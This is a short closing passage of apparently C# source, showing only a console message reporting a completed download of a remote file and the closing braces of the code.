        Console.WriteLine("[*] '{0}' Download completed", remoteFile);
    }
}
177 | }
178 |
--------------------------------------------------------------------------------